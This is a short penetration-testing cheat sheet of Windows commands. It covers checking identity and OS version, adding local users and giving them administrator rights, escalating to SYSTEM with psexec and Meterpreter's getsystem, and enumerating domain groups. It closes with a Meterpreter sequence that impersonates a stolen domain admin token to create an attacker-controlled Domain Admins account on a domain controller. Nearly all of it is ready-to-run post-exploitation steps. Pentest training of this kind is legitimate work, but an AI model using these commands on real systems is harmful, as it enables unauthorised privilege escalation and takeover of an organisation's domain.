Title: Simple Windows Commands used in Penetration TestingAuthor: ajayverma
Check Who You Are

echo %USERDOMAIN%\%USERNAME
whoami
Check Windows Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Add a User

net user <username> <password> /add</password></username>

Add a User to the Administrators Group

net localgroup administrators <username> /add
Getting from Administrator to System

psexec -s cmd.exe
Getting system with Meterpreter

getsystem
(from the meterpreter shell)

Changing a Users Password

net user <username> <password>
View Domain Groups

net group /domain
View Members of Domain Group

net group /domain <Group Name>
Add Member with Domain Admin
This attack is on the assumption you have obtained a meterpreter shell on a system and you’re lucky enough to have found a domain admin’s token.

impersonate_token <Domain>\\<Username> # The Domain Admin's Username
add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker defined Username
add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>
You should now have an account on the Domain Controller with Domain Admin privileges


Submitted On: 2019-05-30 12:51:17